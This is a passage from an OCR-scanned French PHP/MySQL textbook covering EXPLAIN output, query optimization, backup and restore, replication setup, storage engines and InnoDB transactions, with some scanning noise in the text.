pouvez obtenir ce format en faisant terminer votre requete par \G au lieu d'un point- 
virgule). 
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*************************** -| pow *************************** 

id: 1 

select_type: SIMPLE 

table: commandes 

type: ALL 

possible_keys : PRIMARY 

key: NULL 

key_len: NULL 

ref: NULL 

rows : 4 
Extra : 

*************************** 2 row *************************** 

id: 1 

select_type: SIMPLE 

table: livres_commandes 

type: ref 

possible_keys : PRIMARY 

key: PRIMARY 

key_len: 4 

ref: livres . commandes . idcommande 

rows : 1 

Extra: Using index 
*************************** g row *************************** 

id: 1 

select_type: SIMPLE 

table: clients 

type: ALL 

possible_keys : PRIMARY 

key: NULL 

key_len: NULL 

ref: NULL 

rows : 3 

Extra: Using where; Using join buffer 
*************************** 4 row *************************** 

id: 1 

select_type: SIMPLE 

table: livres 

type: eq_ref 

possible_keys : PRIMARY 

key: PRIMARY 

key_len: 13 

ref: livres . livres_commande . isbn 

rows : 1 

Extra: Using where 

Bien que cette sortie puisse paraitre deroutante au premier abord, elle se revele tres 
utile. Examinons les colonnes de cette table une a une. 



La premiere colonne, id, fournit l'identifiant de l'instruction SELECT dans la requete a 
laquelle cette ligne se refere. 
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La colonne select type explique le type de requete utilise. L' ensemble de valeurs 
possibles pour cette colonne est presente dans le Tableau 12.8. 

Tableau 12.8 : Valeurs possibles de select_type dans la sortie de EXPLAIN 



Type 



Description 



SIMPLE 
PRIMARY 

UNION 

DEPENDENT UNION 

UNION RESULT 
SUBQUERY 

DEPENDENT SUBQUERY 
DERIVED 

UNCACHEABLE SUBQUERY 
UNCACHEABLE UNION 



Requete SELECT standard, comme dans cet exemple 

Requete externe (premiere requete) lorsque Ton utilise des sous- 
requetes ou des unions 

Seconde ou requete suivante dans une union 

Seconde ou requete suivante dans une union, dependant de la requete 
principale 

Resultat d'une union 
Sous-requete interne 

Sous-requete interne, dependant de la requete principale (sous- 
requete correlee) 

Sous-requete utilisee dans la clause FROM 

Sous-requete dont le resultat ne peut pas etre mis en cache et qui sera 
done reevaluee pour chaque ligne 

Seconde ou requete suivante dans une union appartenant a sous- 
requete non cachable 



La colonne table enumere simplement les tables utilisees pour repondre a la requete. 
Chaque ligne du resultat fournit plus d' informations sur la maniere dont cette table 
particuliere est utilisee dans la requete. Ici, vous pouvez voir que les tables utilisees sont 
commandes, livres commandes, clients et livres (ce que vous pouvez deja savoir en 
examinant tout simplement la requete). 

La colonne type explique comment la table est utilisee dans les jointures de la requete. 
Le Tableau 12.9 enumere les valeurs possibles de cette colonne, de la plus rapide a la 
plus lente en terme de rapidite d' execution. Cela vous donne une idee du nombre de 
lignes qui doivent etre lues dans chaque table pour executer une requete. 

Tableau 12.9 : Les differents types de jointures affiches par EXPLAIN 

Type Description 



const ou system 



La table n'est lue qu'une seule fois. Cela se produit lorsque la table ne 
contient qu'une seule ligne. Le type system est utilise avec les tables 
systemes et le type const dans les autres cas. 
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Tableau 12.9 : Les differents types de jointures affiches par EXPLAIN (suite) 

Type Description 

eq ref Pour chaque ensemble de lignes provenant des autres tables de la jointure, 

une seule ligne est lue dans cette table. Ce type de jointure est utilise 
lorsque la jointure se sert de toutes les parties de 1' index sur la table et que 
l'index est UNIQUE ou qu'il s'agit de la cle primaire. 

f ulltext Une jointure sur un index textuel. 

ref Pour chaque ensemble de lignes provenant des autres tables de la jointure, 

vous lisez un ensemble de lignes qui correspondent dans cette table. Ce 
type de jointure est utilise lorsque la jointure ne peut pas choisir une ligne 
unique a partir de la condition de jointure, c'est-a-dire lorsque seule une 
partie de la cle est utilisee dans la jointure, ou si elle n'est pas un index 
UNIQUE ou une cle primaire. 

ref or null Semblable a une requete ref, mais MySQL recherche egalement les lignes 

NULL (ce type est principalement utilise dans les sous-requetes). 

index merge Une optimisation specifique, la fusion d'index, a ete utilisee. 

unique subquery Ce type de jointure sert a remplacer ref pour certaines sous-requetes IN 
qui ne renvoient qu'une seule ligne. 

index subquery Ce type de jointure est semblable a unique subquery mais est utilise pour 
les sous-requetes avec un index non UNIQUE. 

range Pour chaque ensemble de lignes provenant des autres tables de la jointure, 

vous lisez un ensemble de lignes de cette table qui appartiennent a un 
intervalle particulier. 

index Parcours de l'index complet. 

ALL Chaque ligne de la table est traitee. 

Dans l'exemple precedent, vous pouvez constater qu'une table est jointe avec eq ref 
(livres), qu'une autre Test avec ref (livres commandes) et que les deux autres 
(commandes et clients) sont jointes avec ALL, c'est-a-dire en examinant chaque ligne 
de la table. 

La colonne rows conserve ces informations : elle contient une estimation approximative 
du nombre de lignes de chaque table qui doivent etre parcourues pour effectuer la join- 
ture. Vous pouvez les multiplier entre elles pour obtenir le nombre total de lignes 
examinees pour effectuer une requete. Ces chiffres doivent etre multiplies puisqu'une 
jointure est comparable a un produit des lignes appartenant a differentes tables. Repor- 
tez-vous au Chapitre 10 pour plus de details. N'oubliez pas qu'il s'agit du nombre de 
lignes examinees, pas du nombre de lignes renvoyees, et qu'il s'agit seulement d'une 
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estimation : MySQL ne peut pas deviner le resultat final avant d'effectuer reellement la 
requete. 

Naturellement, plus ce nombre est faible, mieux c'est. Pour l'instant, notre base de 
donnees contient tres peu de donnees mais, lorsque la taille d'une base commence a 
augmenter, une requete de ce genre demultiplie le temps d'execution. Nous y reviendrons 
un peu plus loin dans ce chapitre. 

La colonne possible keys fournit la liste des cles que MySQL peut utiliser lors d'une 
operation de jointure realisee avec la table. Dans ce cas, vous pouvez voir que les cles 
possibles sont en fait toutes les cles primaires. 

La colonne key correspond soit a la cle de la table MySQL utilisee, soit a NULL si aucune 
cle n'a ete employee. Vous remarquerez que, bien qu'il y ait des cle primaires possibles 
pour les tables clients et commandes, aucune n'a ete utilisee dans cette requete. 

La colonne key len indique la longueur de la cle utilisee. Vous pouvez vous en servir 
pour savoir si la cle n'a ete utilisee que partiellement. Cette information est importante 
lorsque des cles sont composees de plusieurs colonnes. Dans le cas present, pour lequel 
des cles ont ete utilisees, c'est la totalite de la cle qui a ete employee. 

La colonne ref montre les colonnes utilisees avec la cle pour selectionner des lignes 
dans la table. 

Enfm, la colonne Extra fournit toutes les autres informations concernant la maniere 
dont la jointure a ete effectuee. Le Tableau 12.10 enumere quelques valeurs que vous 
pourrez rencontrer dans cette colonne. Pour disposer de la liste complete, qui contient 
plus de quinze possibilites, consultez le manuel de MySQL, http://dev.mysql.com/ 
doc/refman/5.1/en/using-explain.html. 

Tableau 12.10 : Les valeurs possibles de la colonne Extra, qui apparait dans la sortie 
de EXPLAIN 

Valeur Signification 

Distinct Une fois la premiere ligne correspondante trouvee, MySQL cesse de 

rechercher des lignes. 

Not exists La requete a ete optimisee pour se servir de LEFT JOIN. 

Range checked for Pour chaque ligne de l'ensemble de lignes des autres tables de la 

jointure, MySQL tente de trouver le meilleur index a utiliser, s'il y en a 
un. 



Using filesort 



II faudra deux passes pour trier les donnees, ce qui prend naturellement 
deux fois plus de temps. 
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Tableau 12.10 : Les valeurs possibles de la colonne Extra, qui apparait dans la sortie 
de EXPLAIN (suite) 



Valeur Signification 



Using 


index 


Toutes les informations de la table proviennent de l'index, c'est-a-dire 
que les lignes ne sont en realite pas examinees. 


Using 


join buffer 


Les tables sont lues par portions en utilisant le tampon de jointure, puis 
les lignes sont extraites de ce tampon pour terminer la requete. 


Using 


temporary 


11 faut creer une table temporaire pour executer cette requete. 


Using 


where 


Une clause WHERE est utilisee pour selectionner les lignes. 



II existe plusieurs manieres de resoudre les problemes mis en evidence par la sortie de 
EXPLAIN. 

Tout d'abord, verifiez les types des colonnes et assurez-vous que ce sont les memes. 
Ceci est particulierement valable pour la largeur des colonnes car les index ne peuvent 
pas etre utilises pour associer des colonnes si elles ont des largeurs differentes. Vous 
pouvez resoudre ce probleme en modifiant le type des colonnes a associer ou en inte- 
grant ces informations lors de la conception de votre base de donnees. 

Ensuite, vous pouvez demander a l'optimiseur de jointure d'examiner les distributions 
des cles et done de mieux optimiser les jointures a l'aide de l'utilitaire myisamchk ou de 
l'instruction ANALYZE TABLE, qui sont equivalents. Vous pouvez invoquer cet outil grace 
a la ligne suivante : 

myisamchk --analyze chemin_de_la_base_de_donnees_MySQL I table 

Vous pouvez verifier plusieurs tables en les indiquant toutes sur la ligne de commande 
ou en utilisant la syntaxe suivante : 

myisamchk --analyze chemin_de_la_base_de_donnees_MySQL/* .MYI 

Pour verifier toutes les tables de toutes les bases de donnees, utilisez la commande 
suivante : 

myisamchk --analyze chemin_du_repertoire_de_donnees_MySQL/ * I* . MYI 

Vous pouvez egalement enumerer les tables dans une instruction ANALYZE TABLE a 
partir du moniteur MySQL : 

analyze table clients, commandes, livres_commandes, livres; 

Troisiemement, vous pouvez envisager l'ajout d'un nouvel index dans la table. Si la 
requete est a la fois lente et classique, cette operation est fortement recommandee. S'il 
s'agit d'une requete que vous ne serez plus amend a effectuer, cette modification n'en 
vaut probablement pas la peine, d'autant plus qu'elle pourrait ralentir d'autres choses. 
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Si la colonne possible keys de EXPLAIN contient plusieurs valeurs NULL, vous pouvez 
ameliorer les performances de votre requete en ajoutant un index dans la table en ques- 
tion. Si la colonne que vous utilisez dans votre clause WHERE peut accepter un index, 
vous pouvez vous servir de la commande suivante pour en creer un : 

ALTER TABLE table ADD INDEX (colonne); 

Astuces generales d'optimisation 

Outre les conseils d'optimisation des requetes que nous venons de presenter, il existe 
plusieurs mesures que vous pouvez prendre pour ameliorer globalement les performances 
de votre base de donnees MySQL. 

Optimisation de ['architecture 

D'une maniere generale, tous les elements de votre base de donnees doivent etre aussi 
petits que possible. Pour cela, vous pouvez commencer par choisir une architecture 
correcte, qui minimise les redondances. Vous pouvez egalement choisir les types de 
donnees les plus petits possibles pour vos colonnes. II faut egalement eviter les valeurs 
NULL autant que faire se peut et rendre vos cles primaires aussi courtes que possible. 

Evitez les colonnes a largeur variable (comme VARCHAR, TEXT ou BLOB). Si vos tables 
possedent des champs de largeur fixe, elles seront plus rapides a utiliser, bien qu'elles 
necessitent plus de place. 

Permissions 

Outre les recommandations que nous venons de voir a propos d' EXPLAIN, vous pouvez 
ameliorer la vitesse de vos requetes en simplifiant les permissions. Nous avons deja 
explique la maniere dont les requetes sont verinees par le systeme de permissions avant 
d'etre executees. Plus ce processus est simple, plus vos requetes seront executees rapi- 
dement. 

Optimisation des tables 

Quand une table a ete utilisee pendant un certain temps, ses donnees peuvent etre frag- 
mentees si vous y avez apporte des mises a jour et des suppressions. Cette fragmenta- 
tion ralentit les recherches dans cette table. Vous pouvez corriger cette situation grace a 
1' instruction suivante : 

OPTIMIZE TABLE nomtable; 

ou en tapant cette commande a l'invite du systeme d' exploitation : 

myisamchk -r table 
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Vous pouvez egalement vous servir de l'utilitaire myisamchk pour trier l'index d'une 
table et les donnees conformement a cet index, comme ceci : 

myisamchk --sort-index --sort-records=1 

chemin_du_repertoire_de_donnees_MySQL/* I * . MYI 

Utilisation des index 

Pour accelerer les requetes, servez-vous des index lorsque cela est necessaire. Restez 
simple et ne creez pas d'index superflus qui ne seront pas utilises par vos requetes. Vous 
pouvez verifier si un index sera utilise en executant EXPLAIN, comme nous l'avons deja 
vu. 

Utiliser des valeurs par defaut 

Lorsque cela est possible, utilisez des valeurs par defaut pour les colonnes et n'inserez 
des donnees que si elles sont differentes de la valeur par defaut. Cela permet de reduire 
le temps d'execution de l'instruction INSERT. 

Autres astuces 

II existe beaucoup d' autres astuces pour ameliorer les performances dans des situations 
particulieres ou lorsque vous avez des besoins precis. Le site web de MySQL, http:// 
www.mysql.com, propose plusieurs astuces de ce genre. 

Sauvegarder votre base de donnees MySQL 

Avec MySQL, vous disposez de plusieurs possibility's pour realiser une sauvegarde. 

La premiere methode consiste a verrouiller les tables, avec une commande LOCK 
TABLES, et a copier les fichiers physiques situes sur le disque dur. Voici la syntaxe de 
cette commande : 

LOCK TABLES table type_verrou [ , table type_verrou . . .] 

Chaque table doit etre designee par son nom et le type du verrou peut etre READ ou 
WRITE. Pour une sauvegarde vous n'avez normalement besoin que d'un verrou en 
lecture (READ). Vous devez egalement executer une commande FLUSH TABLES afin de 
vous assurer que toutes les modifications de vos index ont ete ecrites sur le disque avant 
de realiser une sauvegarde. 

Pendant cette sauvegarde, les utilisateurs et les scripts pourront continuer a executer des 
requetes ne demandant qu'un acces en lecture. Cependant, si votre serveur doit satis- 
faire un gros volume de requetes modifiant la base de donnees, comme des commandes 
de clients, cette solution est a eviter. 
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La seconde methode, qui est superieure, implique le recours a la commande 
mysql dump. Son utilisation (depuis la ligne de commande du systeme d' exploitation) 
est generalement de la forme : 

mysqldump --opt --all-databases > all.sql 

Cette ligne de commande ecrira dans le fichier all.sql tout le code SQL necessaire a la 
reconstruction de la base de donnees. 

Ensuite, il est preferable d'arreter pendant un moment le processus mysqld et de le rede- 
marrer avec l'option log bin [ =fichierlog]. De cette facon, les mises a jour seront 
enregistrees dans le fichier log, ce qui vous permettra de disposer des modifications 
realisees sur la base de donnees depuis votre operation de sauvegarde (les fichiers log 
doivent bien sur etre sauvegardes lors de toutes les operations de sauvegarde des 
fichiers). 

Une troisieme methode consiste a utiliser le script mysqlhotcopy, que vous pouvez 
appeler de la facon suivante : 

mysqlhotcopy database /chemin I vers /sauvegarde 
Vous devez ensuite suivre le processus de demarrage et d' arret de la base de donnees, 
comme nous l'avons indique precedemment. 

Une derniere methode de sauvegarde (et de reprise) consiste a gerer une copie repliquee 
de la base de donnees. La replication est traitee plus loin dans ce chapitre. 

Restauration de votre base de donnees MySQL 

Pour restaurer une base de donnees MySQL, vous disposez de deux possibilites. Si le 
probleme provient d'une table abimee, vous pouvez lancer myisamchk avec l'option r 
(reparation). 

Si vous avez employe la premiere methode de sauvegarde, vous pouvez copier les 
fichiers de donnees aux memes emplacements que les originaux dans une nouvelle 
installation MySQL. 

Si vous avez utilise la seconde methode, il vous faut realiser deux etapes. Vous devez en 
premier lieu executer les requetes contenues dans le fichier de sauvegarde afin de 
reconstruire la base de donnees dans l'etat ou elle se trouvait au moment de la sauve- 
garde. Puis vous devez mettre a jour la base de donnees jusqu'au point stocke dans le 
log binaire. Vous pouvez le faire en executant la commande : 

mysqlbinlog hote-bin . [0-9] * | mysql 

Vous trouverez plus d' informations sur les operations de sauvegarde et de restauration 
sur le site web de MySQL, http://www.mysql.com. 
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Implementer la replication 

La replication est une technique grace a laquelle plusieurs serveurs de base de donnees 
peuvent servir les memes donnees. II est ainsi possible d'equilibrer la charge et 
d'ameliorer la nabilite du systeme. Si un systeme est en panne, les autres peuvent 
toujours etre interroges. Une fois configuree, la replication peut egalement etre utilisee 
pour realiser des sauvegardes. 

L'idee fondamentale consiste a avoir un serveur maitre et a lui ajouter un certain 
nombre d'esclaves. Chacun des esclaves offre une replication en miroir du maitre. Lors- 
que vous configurez initialement les esclaves, vous copiez un instantane de toutes les 
donnees du maitre a ce moment precis. Puis les esclaves demandent des mises a jour de 
la part du maitre. Le maitre transmet les details des requetes executees grace a son journal 
binaire et les esclaves reappliquent ces requetes aux donnees. 

L'approche habituelle pour utiliser cette configuration consiste a appliquer les requetes 
en ecriture au maitre et les requetes en lecture aux esclaves. Des architectures plus 
complexes sont egalement possibles, par exemple en incluant plusieurs maitres, mais 
nous ne traiterons ici que du cas de figure le plus courant. 

Vous devez bien comprendre que les esclaves ne possedent generalement pas des 
donnees aussi a jour que celles du maitre. Cet etat de fait se produit dans n'importe 
quelle base de donnees distribute. 

Pour entamer la configuration d'une architecture maitre/esclaves, vous devez vous 
assurer que la journalisation binaire est activee sur le maitre. Pour plus d' informations 
a ce sujet, consultez l'Annexe A. 

Vous devez editer votre fichier my.ini ou wy.cn/ sur les serveurs maitre et esclave. Sur le 
maitre, utilisez la configuration suivante : 

[mysqld] 

log-bin 

server-id=1 

Le premier reglage active la journalisation binaire (il devrait done deja etre present ; s'il 
ne Test pas, ajoutez-le). Le second donne a votre maitre un identifiant unique. Chaque 
esclave requiert egalement un identifiant : vous devez done ajouter une ligne semblable 
aux fichiers my.ini/my.cnf sur chacun des esclaves. Assurez-vous que ces nombres 
soient uniques ! Par exemple, votre premier esclave pourrait etre parametre avec 
server id=2, le second, avec server id=3, etc. 

Configurer le maitre 

Sur le maitre, vous devez creer un utilisateur pour la connexion des esclaves. II existe 
un niveau de privilege special pour les esclaves, appele esclave de replication. Selon la 
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maniere dont vous prevoyez de realiser le transfert de donnees initial, il se peut que 
vous deviez temporairement accorder certains privileges supplementaires. 

Dans la plupart des cas, vous utiliserez un instantane de la base de donnees pour trans- 
ferer les donnees, et, dans ce cas, seul le privilege special esclave de replication est 
necessaire. Si vous decidez d'utiliser la commande LOAD DATA FROM MASTER pour trans- 
ferer les donnees (voir la prochaine section), l'utilisateur aura besoin des privileges 
RELOAD, SUPER et SELECT, mais uniquement pour la configuration initiale. Selon le prin- 
cipe du moindre privilege expose au Chapitre 9, vous devrez revoquer ces autres privi- 
leges une fois que le systeme est operationnel. 

Creez un utilisateur sur le maitre. Vous pouvez lui attribuer le nom et le mot de passe de 
votre choix, mais ne perdez pas ces informations. Dans notre exemple, nous appellerons 
cet utilisateur esc rep : 

grant replication slave 
on * . * 

to 'esc_rep'@'%' identified by 'motdepasse' ; 
Remplacez evidemment motdepasse par le mot de passe de votre choix. 

Realiser le transfert de donnees initial 

II existe plusieurs moyens de transferer les donnees depuis le maitre vers l'esclave. Le 
plus simple consiste a configurer les esclaves (voir la section suivante) et a executer une 
instruction LOAD DATA FROM MASTER. Le probleme avec cette approche tient a ce que les 
tables sur le maitre seront verrouillees pendant que les donnees sont transferees. 
Comme cette operation peut prendre un certain temps, nous ne conseillons pas cette 
methode (vous ne pouvez l'utiliser que si vous utilisez des tables MylSAM). 

En general, il est preferable de prendre un instantane de la base de donnees. Pour cela, 
vous pouvez utiliser les procedures decrites pour la realisation des sauvegardes dans ce 
chapitre. Vous devez au prealable purger les tables avec l'instruction suivante : 

flush tables with read lock; 

Le verrou en lecture est requis parce que vous devez enregistrer la position du serveur 
dans son journal binaire lorsque l'instantane est effectue. Vous pouvez le faire en executant 
l'instruction suivante : 

show master status; 

Cette instruction doit produire une sortie comme celle-ci : 



File 


- + - 
I 

- + - 


Position 


_+ + 

| Binlog_Do_DB | Binlog_Ignore_DB 

_+ + 


laura-ltc-bin. 000001 


I 

- + - 


95 


I I 

_+ + 
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Notez le fichier et la position. Vous aurez besoin de ces informations pour configurer les 
esclaves. 

Puis prenez votre instantane et deverrouillez les tables avec 1' instruction suivante : 
unlock tables; 

Si vous utilisez des tables InnoDB, le moyen le plus simple consiste a utiliser l'outil 
InnoDB Hot Backup, propose par Innobase Oy a l'adresse http://www.innodb.com. II 
ne s'agit pas d'un logiciel libre et sa licence n'est pas gratuite. Sinon vous pouvez utili- 
ser la procedure derate ici et, avant de deverrouiller les tables, fermer le serveur 
MySQL et copier le repertoire entier pour la base de donnees que vous souhaitez repliquer 
avant de redemarrer le serveur et de deverrouiller les tables. 

Configurer I'esclave ou les esclaves 

Deux options vous sont proposees pour configurer I'esclave ou les esclaves. Si vous 
avez effectue un instantane de votre base de donnees, commencez par l'installer sur le 
serveur esclave. 

Ensuite, executez les requetes suivantes sur votre esclave : 

change master to 
master-host= ' serveur ' , 
master-user= 1 utilisateur' , 
master-password= 'motdepasse, 
master-log-f ile= ' fichier_journal ' , 
master-log-pos=pos_j ournal ; 
start slave; 

Vous devez remplacer les donnees en italique. serveur correspond au nom du serveur 
maitre. utilisateur et motdepasse proviennent de l'instruction GRANT que vous avez 
executee sur le serveur maitre. fichier journal et pos journal proviennent de la sortie 
de l'instruction SHOW MASTER STATUS que vous avez executee sur le serveur maitre. 

Votre systeme de replication doit maintenant etre operationnel. 

Si vous n'avez pas effectue d'instantane, vous pouvez charger les donnees depuis le 
maitre apres avoir execute la requete precedente en executant l'instruction suivante : 

load data from master; 

Pour aller plus loin 

Dans ces chapitres sur MySQL, nous nous sommes interesses aux utilisations et aux 
parties du systeme les plus etroitement associees au developpement web, ainsi qu'a la 
liaison entre MySQL et PHP. 

Si vous souhaitez approfondir vos connaissances concernant MySQL, vous pouvez 
visiter le site web de MySQL, http://www.mysql.com. 
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Vous pouvez egalement consulter le livre MySQL 5, Guide officiel de Paul Dubois, 
publie par les editions Pearson Education France en 2006. 

Pour la suite 

Dans le chapitre suivant, nous examinerons certaines des fonctionnalites avancees de 
MySQL utiles pour la programmation d' applications web, comme le choix des moteurs 
de stockage, les transactions et les procedures stockees. 



13 



Programmation MySQL avancee 



Dans ce chapitre, nous traiterons de sujets MySQL plus avances, comme les types de 
tables, les transactions et les procedures stockees. 

L'instruction LOAD DATA IN FILE 

L'instruction LOAD DATA INFILE fait partie des fonctionnalites utiles de MySQL que 
nous n'avons pas encore traitees. Elle permet de charger des tables a partir d'un fichier 
et s' execute tres rapidement. 

Cette commande flexible possede de nombreuses options, mais elle s'utilise le plus 
souvent de la maniere suivante : 

LOAD DATA INFILE "nouveaux_livres.txt" INTO TABLE livres; 

Cette ligne lit les lignes du fichier newbooks.txt et les insere dans la table livres. Par 
defaut, les champs de donnees dans le fichier doivent etre separes par des tabulations et 
entoures d' apostrophes, chaque ligne etant separee par un caractere de nouvelle ligne 
(\n). Les caracteres speciaux doivent etre proteges par un antislash (\). Toutes ces 
caracteristiques sont configurables grace aux diverses options de l'instruction LOAD ; 
pour plus d' informations a ce sujet, consultez le manuel MySQL. 

Pour utiliser l'instruction LOAD DATA INFILE, l'utilisateur doit posseder le privilege 
FILE presente au Chapitre 9. 

Les moteurs de stockage 

MySQL supporte un certain nombre de moteurs de stockage, que Ton appelle parfois 
aussi types de tables. En d'autres termes, vous pouvez choisir 1' implementation sous- 
jacente des tables. Chaque table d'une meme base de donnees peut utiliser un moteur de 
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stockage different et les tables peuvent aisement etre converties pour passer d'un type a 
un autre. 

Pour choisir le type de table lorsque vous creez votre table, utilisez 1' instruction 
suivante : 

CREATE TABLE table TYPE=type 

Les types de tables generalement disponibles sont les suivants : 

■ MylSAM. II s'agit du type par defaut et c'est celui que nous avons utilise jusqu'a 
present dans ce livre. II est fonde sur le type ISAM (Indexed Sequential Access 
Method, ou "methode d'acces sequentiel indexe) traditionnel, une methode stan- 
dard pour stocker les enregistrements et les fichiers. MylSAM offre un certain 
nombre d'avantages supplementaires par rapport au type ISAM. Par comparaison 
avec les autres moteurs de stockage, MylSAM est celui qui possede le plus d'outils 
pour la verification et la reparation des tables. Les tables MylSAM peuvent etre 
compressees et supportent la recherche plein texte. En revanche, elles ne permet- 
tent pas d'executer des transactions de facon sure et ne reconnaissent pas les cles 
etrangeres. 

H MEMORY (auparavant appelee HEAP). Les tables de ce type sont stockees en 
memoire et leurs index sont haches. Les tables MEMORY sont ainsi extremement 
rapides, mais vos donnees seront perdues si le serveur se plante. Ces caracteristi- 
ques font des tables MEMORY des candidates ideales pour le stockage de donnees 
temporaires ou derivees. Vous devez indiquer MAX ROWS dans l'instruction CREATE 
TABLE ; sinon ces tables pourraient consommer toute votre memoire. En outre, elles 
ne peuvent pas posseder de colonnes de types BLOB, TEXT ou AUTO INCREMENT. 

MERGE. Ces tables vous permettent de traiter une collection de tables MylSAM 
comme une seule table lors de vos requetes. II est ainsi possible de contourner les 
limites relatives a la taille de fichier maximale sur certains systemes d'exploitation. 

■ ARCHIVE. Ces tables permettent de stocker de gros volumes de donnees avec une 
empreinte memoire minimale. Les tables de ce type n'autorisent que les requetes 
INSERT et SELECT ; vous ne pouvez pas leur appliquer d' instructions DELETE, UPDATE 
ou REPLACE. En outre, elles n'utilisent pas d'index. 

S CSV. Ces tables sont stockees sur le serveur sous la forme d'un unique fichier 
contenant des valeurs separees par des virgules. L'avantage de ce type de table 
n'apparait que lorsque vous devez consulter ou manipuler des donnees dans un 
tableur comme Microsoft Excel. 

■ InnoDB. Ces tables permettent d'effectuer des transactions correctement 
puisqu'elles fournissent les fonctionnalites COMMIT et ROLLBACK. Les tables InnoDB 
savent egalement gerer les cles etrangeres. Pour certaines applications, tous ces 
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avantages peuvent compenser le fait qu'elles sont plus lentes que les tables 
My IS AM. 

Dans la plupart des applications web, vous utiliserez generalement des tables MylSAM 
ou InnoDB, ou une combinaison des deux. 

Vous devriez choisir des tables MylSAM lorsque vous executez un grand nombre 
d' instructions SELECT ou INSERT (non entrelacees) sur une table car il s'agit du moyen 
le plus rapide de le faire. Pour de nombreuses applications web comme les catalogues 
de produits, MylSAM est le meilleur choix. Vous devriez egalement utiliser MylSAM 
si vous avez besoin de fonctionnalites de recherche en plein texte. En revanche, utilisez 
le moteur de stockage InnoDB lorsque les transactions sont importantes, par exemple 
pour les tables stockant des donnees financieres ou dans le cas ou les instructions 
INSERT et SELECT sont entrelacees, comme dans les forums en ligne. 

Vous pouvez utiliser des tables MEMORY pour les tables temporaires ou pour imple- 
menter des vues. Les tables MERGE sont utiles si vous devez gerer des tables MylSAM 
de tres grande taille. 

Vous pouvez modifier le type d'une table apres sa creation a l'aide d'une instruction 
ALTER TABLE, comme ceci : 

alter table commandes type=innodb; 

alter table livres_commandes type=innodb; 

Dans la majeure partie de ce livre, nous avons utilise des tables MylSAM. Nous nous 
concentrerons a present sur 1' utilisation des transactions et leurs implementations dans 
les tables InnoDB. 

Les transactions 

Les transactions sont des mecanismes qui assurent la coherence des bases de donnees, 
notamment dans l'eventualite d'une erreur ou d'un plantage du serveur. Dans les sections 
qui suivent, nous expliquerons ce que sont les transactions et comment les implementer 
avec InnoDB. 

Comprendre la definition des transactions 

II convient tout d'abord de defmir le terme transaction. Une transaction est une requete 
ou un ensemble de requetes dont il est garanti qu'il sera soit entierement execute sur la 
base de donnees, soit pas execute du tout. La base de donnees restera done toujours 
dans un etat coherent, que la transaction soit realisee ou non. 

Pour mieux comprendre l'importance de cette caracteristique, considerez une base de 
donnees d'operations bancaires et imaginez que vous souhaitiez transferer de l'argent 
d'un compte a un autre. Cette action implique de supprimer l'argent d'un compte et de 



330 Partie II 



Utilisation de MySQL 



l'inserer dans un autre, ce qui necessite au moins deux requetes. II est de la plus haute 
importance que ces deux requetes soient executees toutes les deux ou qu'elles ne soient 
executees ni l'une ni l'autre. Si vous retirez l'argent d'un compte et qu'une panne de 
courant survienne avant que vous ne l'ayez place dans l'autre compte, que se passera-t-il ? 
L'argent aura disparu ? 

Vous avez peut-etre deja entendu parler de la conformite a ACID. ACID est un acronyme 
decrivant quatre conditions que les transactions doivent satisfaire : 

■ Atomicite. Les transactions doivent etre atomiques. Autrement dit, elles doivent 
etre soit entierement executees, soit pas du tout executees. 

■ Coherence. Les transactions doivent laisser la base de donnees dans un etat coherent. 

■ Isolation. Les transactions non terminees ne doivent pas etre visibles pour les autres 
utilisateurs de la base de donnees ; autrement dit, elles doivent rester isolees tant 
qu'elles ne sont pas terminees. 

■ Durability. Une fois ecrites dans la base de donnees, les transactions doivent rester 
permanentes ou durables. 

Une transaction qui a ete ecrite de maniere permanente dans la base de donnees est dite 
validee. Une transaction qui n'est pas ecrite dans la base de donnees (de sorte que la 
base de donnees est replacee dans l'etat qui etait le sien avant que la transaction ne 
commence) est dite annulee. 

Utiliser des transactions avec InnoDB 

Par defaut, MySQL s'execute en mode autocommit, ce qui signifie que chaque instruction 
que vous executez est immediatement ecrite (validee) dans la base de donnees. Si vous utili- 
sez un type de table transactionnel, vous ne voudrez sfirement pas de ce comportement. 

Pour desactiver le mode autocommit dans la session courante, tapez : 

set autocommit=0; 

Lorsque le mode autocommit est active, vous pouvez le desactiver temporairement 
avec 1' instruction suivante : 

start transaction; 

Lorsque vous avez fini d'entrer les instructions qui constituent une transaction, vous 
pourrez la valider dans la base de donnees en tapant simplement : 

commit ; 

Si vous avez change d'avis, vous pouvez revenir a l'etat precedent de la base de 
donnees en tapant : 

rollback ; 
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Tant que vous n'avez pas valide une transaction, cette derniere n'est pas visible pour les 
autres utilisateurs ni dans dans les autres sessions. 

A titre d'exemple, executez ces instructions ALTER TABLE sur votre base de donnees 
livres si vous ne l'avez pas deja fait en lisant la section precedente. 

alter table livres_commandes=innodb; 
alter table commandes type=innodb; 

Ces instructions convertissent deux des tables en tables InnoDB (vous pourrez les 
reconvertir par la suite si vous le souhaitez, en executant ces memes instructions mais 
avec type=MyISAM). 

Puis ouvrez deux connexions a la base de donnees livres. Dans une connexion, ajoutez 
une nouvelle commande de livre a la base de donnees : 

insert into commandes values (5, 2, 69.98, '2008-06-18'); 
insert into livres_commandes values (5, '0-672-31697-8', 1); 

Verifiez que vous pouvez voir cette nouvelle commande : 

select * from commandes where idcommande=5; 

Vous devriez voir ce resultat s'afficher : 

| idcommande [ idclient | montant | date | 
| 5 | 2 | 69.98 | 2008-06-18 | 

Conservez cette connexion ouverte, accedez a votre autre connexion et executez la 
meme requete de selection. Vous ne devriez cette fois pas pouvoir voir la commande : 

Empty set (0.00 sec) 

(Si vous la voyez, c'est surement parce que vous n'avez pas desactive le mode auto- 
commit. Verifiez et assurez-vous que vous avez bien converti la table au format 
InnoDB. En effet, la transaction n'a pas encore ete validee - c'est 1' illustration du prin- 
cipe d'isolation des transactions.) 

A present, revenez a la premiere connexion et validez la transaction : 
commit ; 

Vous devriez maintenant pouvoir retrouver la ligne dans votre autre connexion. 

Les cles etrangeres 

InnoDB reconnait egalement les cles etrangeres, que nous avons traitees au Chapitre 8. 
Lorsque vous utilisez des tables MylSAM, vous n'avez aucun moyen de faire appliquer 
les contraintes liees aux cles etrangeres. 
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Dans le cas de l'insertion d'une ligne dans la table livres commandes, vous devez 
inclure un idcommande valide. Avec MylSAM, vous devez verifier quelque part dans le 
code de votre application la validite de l'identifiant idcommande que vous inserez. Grace 
aux cles etrangeres dans InnoDB, vous pouvez laisser a la base de donnees le soin de 
realiser cette verification pour vous. 

Pour creer la table pour qu'elle utilise une cle etrangere, vous pouvez changer l'instruction 
de creation de table comme suit : 

create table livres_commandes 

( idcommande int unsigned not null references commandes(idcommande) , 

isbn char(13) not null, 

quantite tinyint unsigned, 

